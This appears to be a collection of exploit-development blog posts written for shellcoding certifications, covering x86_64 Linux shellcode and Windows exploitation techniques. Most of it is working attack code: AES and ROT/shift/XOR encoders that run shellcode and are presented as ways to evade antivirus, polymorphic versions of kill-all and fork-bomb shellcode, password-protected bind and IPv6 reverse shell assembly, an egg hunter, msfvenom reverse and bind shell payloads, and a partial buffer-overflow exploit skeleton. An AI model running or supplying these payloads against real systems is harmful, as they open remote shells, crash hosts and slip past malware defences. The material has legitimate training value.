Bad Characters Sortilege

Introduction

In exploit development world there will be times where you find yourself working with an executable that enforces a very limited character set in which you can use to craft your shellcode. This rather short blog post will talk about how you can use bad characters to your advantage and ultimately produce otherwise prohibited instructions in your shellcode.

Synopsis

While prepping to take the OSCE course earlier this year, I discovered 0day in the register function across Flexense products, see the link EDB-ID: 44455. At the time Structured Exception Handler (SEH) subject was fairly new to me, let alone manual shellcoding. I struggled for days trying to figure out a way to beat this thing before deciding to craft proof of concept shellcode for WinExec() function for reasons that are irrelevant to this blog post. Typically the register function will only accept alphanumeric characters for obvious reasons and as such anything beyond \x7f character is considered bad, this includes pointers and instructions.

During the process of crafting the shellcode, I made sure to stay within the range of allowed characters but then reached a point where I needed JMP ESP instruction but couldn’t find a clean pointer that I can use. To overcome this issue I decided to pass previously identified bad characters to the program to see if any gets converted to an opcode that I could use (in this case was looking for RET instruction) and ultimately found that \xff end up as \xc3, bingo! So I manually encoded  JMP ESP pointer by preforming arithmetic operations on EAX register and pushing it onto the stack.

At this point all we need really is place \xff at the end of the shellcode which will effectively pop previously pushed onto the stack JMP ESP pointer to EIP and execute it! The following is a demo of the exploit, please check the above exploit link for more details.

Final Thoughts

The main takeaway here is always look for ways to circumvent restrictions and don’t take bad characters for granted.. Hopefully this blog post will aid folks who run into similar situations or rather help them come up with more creative ways to solve the problem at hand. Lastly, feel free to correct any inaccurate information I may have provided using the comment section below or tweet me @ihack4falafel.

AES Shellcode Crypter/Decrypter | Linux x86_64

 

Introduction

The Advanced Encryption Standard (AES) is a symmetric block cipher encryption algorithm that uses the same key (also known as secret-key) for encryption and decryption where each cipher encrypts and decrypts data in blocks of 128-bit using cryptographic keys of 128-bit, 192-bit and 256-bit, respectively. AES consist of multiple modes of operation to preform encryption some of which requires random Initialization Vector (IV). In this post we’ll look at shellcode encryption/decryption using AES with 128-bit key and Electronic Codebook (ECB) mode of operation.

Crypter

We will have pycrypto python library do all of the heavy lifting for us. I did add two lambdas one line functions to pad the plaintext and base64 encode the final ciphertext.

Crypter.py
Python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#!/usr/bin/env python
 
from Crypto.Cipher import AES
import sys
import os
import base64
 
if len(sys.argv) != 2:
print '[!] Usage: ' + sys.argv[0] + ' <shellcode>'
sys.exit(1)
 
Shellcode = sys.argv[1]
 
# encrypt shellcode
BlockSize = 16
Seperation ='{'
Pad = lambda s: s + (BlockSize - len(s) % BlockSize) * Seperation
Encode = lambda c, s: base64.b64encode(c.encrypt(Pad(s)))
Key = '_@ihack4falafel_'
print 'Encryption Key     : ' + Key
Cipher = AES.new(Key)
Encoded = Encode (Cipher, Shellcode)
print 'Encrypted Shellcode: ' + Encoded

Decrypter

The decrypter first base64 decode the ciphertext and then decrypt it to reproduce the original plaintext that is the shellcode. Once the shellcode is restored we will use ctypes python library to execute it.

Decrypter.py
Python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#!/usr/bin/env python
 
from Crypto.Cipher import AES
from ctypes import *
import sys
import os
import base64
 
if len(sys.argv) != 2:
print '[!] Usage: ' + sys.argv[0] + ' <shellcode>'
sys.exit(1)
 
Shellcode = sys.argv[1]
 
# decrypt shellcode
Seperation ='{'
decode = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(Seperation)
Key = '_@ihack4falafel_'
print 'Encryption Key     : ' + Key
Cipher = AES.new(Key)
decoded = decode (Cipher, Shellcode)
print 'Decrypted Shellcode: ' + decoded
 
# execute decrypted shellcode using ctypes
libc = CDLL('libc.so.6')
RawShellcode = decoded.replace('\\x','').decode('hex')
sc = c_char_p(RawShellcode)
size = len(RawShellcode)
addr = c_void_p(libc.valloc(size))
memmove(addr, sc, size)
libc.mprotect(addr, size, 0x7)
run = cast(addr, CFUNCTYPE(c_void_p))
run()

I’ve created execve() shellcode that spawns /bin/sh to test with.

execve(/bin/sh, null, null)
C
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
/*
section .text
 
global _start
 
_start:
push rax
cdq
push rdx
pop rsi
mov rbx,'/bin//sh'
push rbx
push rsp
pop rdi
mov al, 59
syscall
*/
 
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x50\x99\x52\x5e\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05";
 
main()
{
printf("Shellcode Length:  %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

Let’s test the scripts using the above shellcode.

If you would like to convert the above python scripts to an executable, please refer to my SLAE32 series where I use pyinstaller to preform said conversion.

Closing Thoughts

In this post we learned about AES and how powerful python can be. This post marks the end of my SLAE64 series, I hope you enjoyed it and learned something along the way. All of the above code are available on my github. Feel free to contact me for questions using the comment section below or just tweet me @ihack4falafel .

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html

Student ID: SLAE64 – 1579

Polymorphic Shellcode | Linux x86_64

Introduction

In general polymorphism mean the ability to appear in many forms, it’s also referred to as a feature of object-oriented programing in computer science. In this post we will take three sample shellcodes off of exploit-db and mutate them in order to beat pattern matching. The final shellcode size should be less or equal to 150% of the original shellcode. Please refer to my SLAE32 series to learn more about polymorphism.

Shellcode I

The first shellcode we’ll look at issues power off command via reboot() function and its 19 bytes in size which means we have up to 28 bytes of space.

reboot(POWER_OFF) Shellcode (19 bytes)
Assembly (x86)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
# Linux/x86_64 reboot(POWER_OFF) 19 bytes shellcode
# Date: 2010-04-25
# Author: zbt
# Tested on: x86_64 Debian GNU/Linux
 
 
/*
    ; reboot(LINUX_REBOOT_MAGIC1, LINUX_REBOOT_MAGIC2,
LINUX_REBOOT_CMD_POWER_OFF)
 
    section .text
        global _start
 
    _start:
        mov     edx, 0x4321fedc
        mov     esi, 0x28121969
        mov     edi, 0xfee1dead
        mov     al,  0xa9
        syscall
*/
int main(void)
{
    char reboot[] =
    "\xba\xdc\xfe\x21\x43"  // mov    $0x4321fedc,%edx
    "\xbe\x69\x19\x12\x28"  // mov    $0x28121969,%esi
    "\xbf\xad\xde\xe1\xfe"  // mov    $0xfee1dead,%edi
    "\xb0\xa9"              // mov    $0xa9,%al
    "\x0f\x05";             // syscall
 
    (*(void (*)()) reboot)();
 
    return 0;
}

The following is the final polymorphic shellcode with a size of 27 bytes.

Polymorphic Shellcode
Assembly (x86)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
; int reboot(int magic, int magic2, int cmd, void *arg)
; rax=169, rdi=0xfee1dead, rsi=0x28121969, rdx=0x4321fedc
 
global _start
 
section .text
 
_start:
add al, 0xa9
mov edi, 0x7F70EF56
shl rdi, 0x1
inc edi
mov edx, 0x28121969
mov esi, 0x4321fedc
xchg rdx, rsi
syscall

Shellcode II

The second shellcode we’re going to play with changes the hostname to "Rooted !" via sethostname() function and then terminate every process for which the calling process has permission to send signals to using kill() function. The original shellcode size is 33 bytes which leave us with 49 bytes.

sethostname(Rooted !) + killall Shellcode (33 bytes)
Assembly (x86)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
# Linux/x86_64 sethostname() & killall 33 bytes shellcode
# Date: 2010-04-26
# Author: zbt
# Tested on: x86_64 Debian GNU/Linux
/*
    ; sethostname("Rooted !");
    ; kill(-1, SIGKILL);
    section .text
        global _start
    _start:
        ;-- setHostName("Rooted !"); 22 bytes --;
        mov     al, 0xaa
        mov     r8, 'Rooted !'
        push    r8
        mov     rdi, rsp
        mov     sil, 0x8
        syscall
        ;-- kill(-1, SIGKILL); 11 bytes --;
        push    byte 0x3e
        pop     rax
        push    byte 0xff
        pop     rdi
        push    byte 0x9
        pop     rsi
        syscall
*/
int main(void)
{
    char shellcode[] =
    "\xb0\xaa\x49\xb8\x52\x6f\x6f\x74\x65\x64\x20\x21\x41\x50\x48\x89"
    "\xe7\x40\xb6\x08\x0f\x05\x6a\x3e\x58\x6a\xff\x5f\x6a\x09\x5e\x0f\x05";
    (*(void (*)()) shellcode)();
    return 0;
}

The final shellcode size is 38 bytes.

Polymorphic Shellcode
Assembly (x86)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
global _start
 
section .text
 
_start:
; int sethostname(const char *name, size_t len)
; rax=170, rdi="Rooted !", rsi=8
add al, 170
mov rbx, 0xDEDF9B9A8B9090AD
not rbx
push rbx
push rsp
pop rdi
push byte 0x9
pop rsi
dec esi
syscall
 
; int kill(pid_t pid, int sig)
; rax=62, rdi=-1, rsi=9
push 62
pop rax
push r15
pop rdi
dec rdi
inc esi
syscall

Shellcode III

The last shellcode generates infinite child processes using fork() function which will effectively render the system unavailable. The original shellcode size is 11 bytes meaning we need to stay below 16 bytes.

Fork Bomb Shellcode (11 bytes)
Assembly (x86)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
/*
;Title: Linux/x86_64 - fork() Bomb (11 bytes)
;Author: Touhid M.Shaikh
;Contact: https://twitter.com/touhidshaikh
;Category: Shellcode
;Architecture: Linux x86_64
;Description: WARNING! this shellcode may crash your computer if executed
in your system.
;Shellcode Length: 11
;Tested on : Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux
 
 
 
===COMPILATION AND EXECUTION Assemmbly file===
 
#nasm -f elf64 shell.asm -o shell.o <=== Making Object File
 
#ld shell.o -o shell <=== Making Binary File
 
#./bin2shell.sh shell <== xtract hex code from the binary(
https://github.com/touhidshaikh/bin2shell)
 
=================SHELLCODE(INTEL FORMAT)=================
 
section .text
    global _start:
_start:
    xor rax,rax
    add rax,57
    syscall
    jmp _start
 
===================END HERE============================
 
====================FOR C Compile===========================
 
Compile with gcc with some options.
 
# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing
 
*/
 
#include<stdio.h>
#include<string.h>
 
 
unsigned char code[] = "\x48\x31\xc0\x48\x83\xc0\x39\x0f\x05\xeb\xf5";
 
main()
{
 
printf("Shellcode Length:  %d\n", (int)strlen(code));
 
int (*ret)() = (int(*)())code;
 
ret();
 
}
 
/*More Shellcode => Download Link :
https://github.com/touhidshaikh/shellcode/tree/master/Linux */

I was able to shrink down the final shellcode size to 7 bytes which is 4 bytes less  than the original one. Defiantly an improvement compared to the other two.

Polymorphic Shellcode
Assembly (x86)
1
2
3
4
5
6
7
8
9
10
11
global _start
 
section .text
 
_start:
; pid_t fork(void)
; rax=57
push 0x39
pop rax
syscall
jnz _start

Closing Thoughts

This post was a good opportunity for me to explore new functions that might come in handy in the future. All of the above code are available on my github. Feel free to contact me for questions using the comment section below or just tweet me @ihack4falafel .

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html

Student ID: SLAE64 – 1579

Analyzing MSFVenom Payloads with Binary Ninja | Linux x86_64

Introduction

In efforts to learn more about Binary Ninja, we will be taking apart three shellcode samples generated via msfvenom. Please note that disassemblers in general including Binary Ninja are fairly new to me and as such this will be a learning experience to me as much as it will be to you.

Shellcode I

First, we’ll look at exec option and generate payload that will run whoami command.

linux/x64/exec
ZSH
1
2
3
4
5
6
7
8
  ~ msfvenom -p linux/x64/exec CMD=whoami -f elf -o whoami
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 46 bytes
Final size of elf file: 166 bytes
Saved as: whoami
  ~

Will use the comment section in Binary Ninja to explain the shellcode as I feel it would be easier to digest this way.

Shellcode II

Next, we will be looking at stage-less reverse shell with localhost IP address and default port of 4444.

Reverse Shell
ZSH
1
2
3
4
5
6
7
8
  ~ msfvenom -p linux/x64/shell_reverse_tcp lhost=127.0.0.1 -f elf -o RevShell
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: RevShell
  ~

Let’s disassemble it.

Shellcode III

Lastly, will dissect stage-less bind shell that listen on all interfaces on port 4444 (default).

Bind Shell
ZSH
1
2
3
4
5
6
7
8
  ~ msfvenom -p linux/x64/shell_bind_tcp -f elf -o BindShell
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 86 bytes
Final size of elf file: 206 bytes
Saved as: BindShell
  ~

And the analysis.

Closing Thoughts

I really like Binary Ninja and plan on using it more often moving forward. All of the above binaries are available on my github. Feel free to contact me for questions using the comment section below or just tweet me @ihack4falafel .

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html

Student ID: SLAE64 – 1579

[ROT-N + Shift-N + XOR-N] Shellcode Encoder | Linux x86_64

Introduction

Encoding schemes are used to transform data in a way that makes it consumable by different systems in a safe manner. In this post we’ll look at how we can bypass AVs by ab(using) this scheme to encode otherwise detectable shellcode.

Shellcode

We will be porting an x86 encoder I made a while back exploit-db to make it work with x86_64. Please refer to my SLAE32 series for more details on the encoder. I’ve also made a quick execve() shellcode to test with.

Execve() Shellcode
Assembly (x86)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
section .text
 
global _start
 
_start:
push rax
cdq
push rdx
pop rsi
mov rbx,'/bin//sh'
push rbx
push rsp
pop rdi
mov al, 59
syscall

The encoder (python script) pretty much stays as is, all we need is feed it our newly created  /bin/sh shellcode and generate an encoded version of it.

Encoder Script
Shell
1
2
3
4
  A4 ./Encoder.py 13 1 1337
Original Shellcode: 0x50, 0x99, 0x52, 0x5e, 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x2f, 0x73, 0x68, 0x53, 0x54, 0x5f, 0xb0, 0x3b, 0x0f, 0x05,
Encoded Shellcode : 0x583, 0x475, 0x587, 0x5ef, 0x593, 0x4a9, 0x541, 0x5e7, 0x5d5, 0x5cf, 0x541, 0x541, 0x439, 0x5d3, 0x5f9, 0x5fb, 0x5e1, 0x443, 0x5a9, 0x501, 0x51d, 0x539
  A4

Here’s Decoder.asm ported to x86_64 including previously generated encoded shellcode.

Decoder Shellcode
Assembly (x86)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
global _start
 
section .text
 
_start:
    ;
    ; [ROT-N + SHL-N + XOR-N] encoded execve() code block
    ;
    jmp short call_decoder       ; jump to call_decoder to save encoded_shellcode pointer to RSI
decoder:
 
    pop rsi                      ; store encoded_shellcode pointer in RSI
    push rsi                ; push encoded_shellcode pointer to stack for later execution
    mov rdi, rsi                 ; move encoded_shellcode pointer to RDI
 
decode:
    ;
    ; note: 1) Make sure ROT, SHR, and XOR here match your encoder.py input.
    ;       2) Hence we're limited by the size of encoded_shellcode (word),
    ;          SHR is limited to <1-8> bits. Feel free to upgrade size to DW
    ;          to allow up to 16-bits shift if need be.
    ;
    mov ax, [rsi]                ; move current word from encoded_shellcode to AX
    xor ax, 0x539                ; XOR encoded_shellcode with 1337, one word at a time  
    jz decoded_shellcode         ; if zero jump to decoded_shellcode
    shr ax, 1                    ; shift encoded_shellcode to right by one bit, one word at a time
    sub ax, 13                   ; substract 13 from encoded_shellcode, one word at a time
    mov [rdi], al                ; move decoded byte to RDI
    inc rsi                      ; point to the next encoded_shellcode word
    inc rsi
    inc rdi                      ; point to the next decoded_shellcode byte
    jmp short decode             ; jump to decode and repeat the decoding process for the next word!
 
decoded_shellcode:
    call [rsp]                   ; execute decoded_shellcode
 
call_decoder:
    call decoder
    encoded_shellcode: dw 0x583, 0x475, 0x587, 0x5ef, 0x593, 0x4a9, 0x541, 0x5e7, 0x5d5, 0x5cf, 0x541, 0x541, 0x439, 0x5d3, 0x5f9, 0x5fb, 0x5e1, 0x443, 0x5a9, 0x501, 0x51d, 0x539

Let’s run it.

Out of curiosity, I decided to compare my x86 encoded shellcode VT results (taken at the time the original x86 encoder was created) with x86_64 one and I found the results quite interesting.

x86 VT Results
x86 VT Results
x86_64 VT Results
x86_64 VT Results

Closing Thoughts

The VT results clearly shows that AV vendors don’t care much for x86_64 shellcode at this point in time which is another good reason why we should use it more. All of the above code are available on my github. Feel free to contact me for questions using the comment section below or just tweet me @ihack4falafel .

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html

Student ID: SLAE64 – 1579­

Egg Hunter | Linux x86_64

Introduction

Egg hunter is a technique used to capture larger payloads in memory by tagging the start of the shellcode with an egg. In most cases, egg hunters are used when you don’t have enough space to host your desired shellcode. In this post we’ll create an egg hunter for Linux x86_64 and couple it with execve() shellcode for testing. Please refer to my SLAE32 for more details about egg hunting.

Shellcode

In efforts to experiment with skape awesome piece of shellcode, we will create a slightly different version of egg hunter that does the following:

  • No hardcoded egg marker which will effectively eliminate the need for the second egg marker check.
  • Use a readable memory region as starting address which allow the exclusion of memory access check routine.

As you can see this method is indeed unsafe compared to skape’s but hey it works!

Egg Hunter Shellcode
Assembly (x86)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
global _start
_start:
 
inc rdx               ; pop valid address into rdi
push rdx
pop rdi
push 0x30313232       ; push the marker-1 into the stack
pop rax
inc eax               ; marker is now 0x30313233 so its not hardcoded
EggHunter:
inc rdi           ; increment rdi by one byte
cmp eax,[rdi]         ; check for egg match
jnz EggHunter         ; if not found jump to EggHunter label
inc rdi               ; increment rdi pointer by 4
inc rdi
inc rdi
inc rdi
jmp rdi               ; jump to the shellcode

And as always we follow with a demo.

Closing Thoughts

On behalf of all the shellcoders out there, I would like to say thank you skape for producing such an elegant shellcode that will remain glorious for years to come. All of the above code are available on my github. Feel free to contact me for questions using the comment section below or just tweet me @ihack4falafel .

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html

Student ID: SLAE64 – 1579­

Password Protected TCP Reverse Shell (IPv6) | Linux x86_64

Introduction

In this post we will create a custom TCP reverse shell for Linux x86_64 architecture that requires password to spawn a shell. This post is a continuation of Password Protected TCP Bind Shell | Linux x86_64 and since my SLAE32 series include an in-depth analysis of the functions used in reverse shells we won’t spend too much time there.

Shellcode

I decided to create an IPv6 reverse shell this time around for two reasons, the first being I haven’t done any before! and the second is for some reason msfvenom don’t have one for x86_64 so the final shellcode could be of use to somebody, maybe.

Msfvenom output
ZSH
1
2
3
4
5
6
7
8
9
10
11
12
13
14
  ~ msfvenom -l payloads | grep linux/x64
    linux/x64/exec                                      Execute an arbitrary command
    linux/x64/meterpreter/bind_tcp                      Inject the mettle server payload (staged). Listen for a connection
    linux/x64/meterpreter/reverse_tcp                   Inject the mettle server payload (staged). Connect back to the attacker
    linux/x64/meterpreter_reverse_http                  Run the Meterpreter / Mettle server payload (stageless)
    linux/x64/meterpreter_reverse_https                 Run the Meterpreter / Mettle server payload (stageless)
    linux/x64/meterpreter_reverse_tcp                   Run the Meterpreter / Mettle server payload (stageless)
    linux/x64/shell/bind_tcp                            Spawn a command shell (staged). Listen for a connection
    linux/x64/shell/reverse_tcp                         Spawn a command shell (staged). Connect back to the attacker
    linux/x64/shell_bind_tcp                            Listen for a connection and spawn a command shell
    linux/x64/shell_bind_tcp_random_port                Listen for a connection in a random port and spawn a command shell. Use nmap to discover the open port: 'nmap -sS target -p-'.
    linux/x64/shell_find_port                           Spawn a shell on an established connection
    linux/x64/shell_reverse_tcp                         Connect back to attacker and spawn a command shell
  ~

Creating an IPv6 reverse shell is not rocket science, all we need is use AF_INET6 as domain when calling socket() function and use IPv6 structure to specify what IP and port we want amongst other things (I used localhost ::1 in this case). Lastly, we need to accommodate for the structure length when calling connect() function using RDX register.

Struct sockaddr_in6
C
1
2
3
4
5
6
7
8
9
10
11
12
Address format
           struct sockaddr_in6 {
               sa_family_t     sin6_family;   /* AF_INET6 */
               in_port_t       sin6_port;     /* port number */
               uint32_t        sin6_flowinfo; /* IPv6 flow information */
               struct in6_addr sin6_addr;     /* IPv6 address */
               uint32_t        sin6_scope_id; /* Scope ID (new in 2.4) */
           };
 
           struct in6_addr {
               unsigned char   s6_addr[16];   /* IPv6 address */
           };

The following is the final null-free shellcode. Please refer to the link of my previous post in the introduction section to learn more about read() function used in the password check routine.

Password-protected Reverse Shell (IPv6)
Assembly (x86)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
section .text
 
global _start
 
_start:
 
; int socket(int domain, int type, int protocol)
; rax=41, rdi=10, rsi=1, rdx=0
xor esi,esi
mul esi                
inc esi
push 10
pop rdi
add al, 41
syscall
 
; save socket fd in rdi
xchg rbx,rax
 
; struct sockaddr_in6 struct
push rdx             ; scope id = 0
mov rcx,0xFEFFFFFFFFFFFFFF      ; link local address ::1
not rcx
push rcx
push rdx
push rdx                        ; sin6_flowinfo=0
push word 0x3905         ; port 1337
push word 10             ; sin6_family
 
; int connect(int sockfd, const struct sockaddr *addr,socklen_t addrlen)
; rax=42, rdi=rbx(fd), rsi=sockaddr_inet6, rdx=28 (length)
push rbx
pop rdi
push rsp
pop rsi
push 28
pop rdx
push 42
pop rax
syscall
 
; dup2 (new, old)
; rax=33, rdi=new fd, rsi=0,1,2 (stdin, stdout, stderr)
xchg   rsi, rax
push 0x3
pop rsi
_loop:
push 0x21
pop rax
dec esi
syscall
loopnz _loop
 
; read (int fd, void *bf, size_t count)
; rax=0, rdi=0 (stdin), rsi=rsp, rdx=4 (pwnd)
xor rax, rax
push rax
pop rdi
push rax
push rsp
pop rsi
push 0x4
pop rdx
syscall
 
; check passcode (pwnd)
push 0x646e7770
pop rbx
cmp dword [rsi], ebx
jne _nop
 
; int execve(cont char *filename, char *const argv[], char *const envp[])
; rax=59, rdi=/bin//sh, rsi=0, rdx=0
xor rax, rax
push rax
mov rbx, 0x68732f2f6e69622f
push rbx
push rsp
pop rdi
push rax
push rsp
pop rsi
cdq
push 0x3b
pop rax
syscall
 
_nop:
nop

Now its demo time.

Closing Thoughts

I did learn a thing or two about IPv6 addressing while crafting this shellcode and I hope you did too. All of the above code are available on my github or exploit-db. Feel free to contact me for questions using the comment section below or just tweet me @ihack4falafel .

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html

Student ID: SLAE64 – 1579­

Password Protected TCP Bind Shell | Linux x86_64

Introduction

In this post we will create a custom TCP bind shell for Linux x86_64 architecture that requires password to spawn a shell. We wont be going into too much details on how each function work as this has already been discussed in my previous Creating Custom TCP Reverse Shell | Linux x86 post.

Shellcode

If you’re not familiar with x86_64 assembly its pretty much the same as x86 from shellcoding standpoint. The following are the key add-ons (I should say) that you get when using x86_64 assembly as opposed to x86:

I used read() function to check for input via stdin and then compare it to a predefined password (in this case I used “pwnd”), if the check fails the shellcode will jump to “_nop” section which will effectivly cause the bind shell to crash. Please refer to the link in the introduction section for more in-depth analysis of the functions used by the bind shell. The following is the final null-free shellcode.

Password Protected Bind Shell (x86_64)
Assembly (x86)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
global _start
 
section .text
 
_start:
 
; int socket(int domain, int type, int protocol)
; rax=41, rdi=2, rsi=1, rdx=0
xor esi,esi
mul esi                
inc esi
push 2
pop rdi
add al, 41
syscall
 
; save socket fd in rdi
xchg   rdi,rax
 
; setup sockaddr strcture (af_inet=2, port=1337, inaddr_any, 0)
     push 2
     mov word [rsp + 2], 0x3905
     push rsp      
     pop rsi
 
; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
; rax=49, rdi=fd, rsi=rsp, rdx=16
push 0x31
pop rax
push rsp
pop rsi
push 0x10
pop rdx
syscall
 
; int listen(int sockfd, int backlog)
; rax=50, rdi=fd, rsi=who cares
pop rsi
push 0x32
pop rax
syscall
 
; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
; rax=43, rdi=fd, rsi=rsp, rdx=16
sub rsp, 0x10
push rsp
pop rsi
push 0x2b
pop rax
push 0x10
push rsp
pop rdx
syscall
 
; store newly spawnd fd in r9
xchg r9,rax
 
; close parent socket
xor rax, rax
push 0x30
pop rax
syscall
 
; dup2 (new, old)
; rax=33, rdi=new fd, rsi=0,1,2 (stdin, stdout, stderr)
xchg   rdi,r9
push 0x3
pop rsi
_loop:
push 0x21
pop rax
dec esi
syscall
loopnz _loop
 
; read (int fd, void *bf, size_t count)
; rax=0, rdi=0 (stdin), rsi=rsp, rdx=4 (pwnd)
xor rax, rax
push rax
pop rdi
push rax
push rsp
pop rsi
push 0x4
pop rdx
syscall
 
; check passcode (pwnd)
push 0x646e7770
pop rbx
cmp dword [rsi], ebx
jne _nop
 
; int execve(cont char *filename, char *const argv[], char *const envp[])
; rax=59, rdi=*/bin//sh, rsi=0, rdx=0
xor rax, rax
push rax
mov rbx, 0x68732f2f6e69622f
push rbx
push rsp
pop rdi
push rax
push rsp
pop rsi
cdq
push 0x3b
pop rax
syscall
_nop:
nop

Now comes that fun part, let’s test out the shellcode.

Closing Thoughts

I feel passwords are essential when it comes to bind shells and hope this post will benefit folks looking to create one. All of the above code are available on my github. Feel free to contact me for questions using the comment section below or just tweet me @ihack4falafel . This post is one of many to come so stay tuned!

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html

Student ID: SLAE64 – 1579­

ROPing the Stack

Introduction

In efforts to learn as much as I can before starting OSCE later this month, I decided to write a blog post about Return Oriented Programming (ROP). ROP in its entirety is fairly new to me and as such this will be learning experience to me as much as it would be to you. Now If you would like a more in-depth overview of the subject I highly recommend reading Corelan Team tutorial, in fact most (if not all!) of what you will see in this blog post is based on information obtained while reading their exploit development series. Lastly, you need to be somewhat familiar with Buffer Overflows and have solid understanding of x86 Assembly before we continue.

ROP

At this point you might be asking yourself what is Return Oriented Programming and why on earth would I need it. Well, from a high-level point of view ROP is set of instruction(s) followed by return (also referred to as gadgets), meaning a given gadget executes and then the return instruction kicks in redirecting the flow of execution to the next gadget inline thus giving us the opportunity to chain multiple commands together to achieve a meaningful function also known as ROP chain (see the figure below).

The reason you would need to construct a ROP chain is something called Data Execution Prevention (DEP), without going into too much details DEP is a system-level memory protection feature that is built into the operating system starting with Windows XP and Windows Server 2003. DEP enables the system to mark one or more pages of memory as non-executable. Marking memory regions as non-executable means that code cannot be run from that region of memory, which makes it harder for the exploitation of Buffer Overflows, for more information on DEP do check this wiki.

In nutshell if DEP is enabled placing your shellcode on the stack via saved return pointer (EIP) or Structured Exception Handling (SEH) record overwrite won’t do the trick and as such you would need to somehow find memory addresses that point to command snippets followed by return instruction in the target program and then place them strategically on the stack to call/execute a function. Now keep in mind your limited by the functions (APIs) used in the program you’re trying to exploit, also you need to account for things like bad characters, SEHOP, and ASLR.

Depending on the situation at hand you can use ROP chains to either call functions like WinExec() to say add user or execute bind shell or use functions that disable DEP by marking region of stack, heap, or the entire process executable. See the table below (used MSDN as reference):

Based on my little experience with ROP gadgets, I’ve noticed that you would run into VritualProtect() and/or VirtualAlloc() calls more often than the other APIs and as such the following section will focus on abusing VritualProtect() to bypass Data Execution Prevention. Below is what you need in order to follow along:

VirtualProtect()

In essence, VirtualProtect() changes the protection options i. e. the way application is allowed to access some memory region already allocated by VirtualAlloc() or other memory functions. I’ve made table of required arguemnts based on information from MSDN.

First things first we need to fire up Immunity Debugger and setup working folder for logging.

Obviously I’ve done this prior to taking the above screenshot hence the old value. At this point I’m going to assume you know how DVD X Player exploit found in EDB-ID: 17745 work and for that reason will skip this part. The next step is to see what ROP functions are available to us in order to bypass DEP.

As you can see the search was limited to application DLLs that don’t have memory protections such as ASLR and SafeSEH turned on and excluded addresses that contain bad characters. Again, I assume you know how to identify  bad characters otherwise I suggest this excellent read here. The screenshot shows mona.py found a total of 48 pointers (3 of which are VirtualProtect()) and the results were written to ropfunc.txt. Let’s overrun the saved return pointer and examine the stack at that point using the following skeleton exploit.

Skeleton Exploit
Python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
#!/usr/bin/env python
 
buffer  = "\x41" * 260                      # eip offset
buffer += "\x42" * 4
buffer += "\x43" * (1500-260-4)
 
try:
f=open("OpenMe.plf","w")
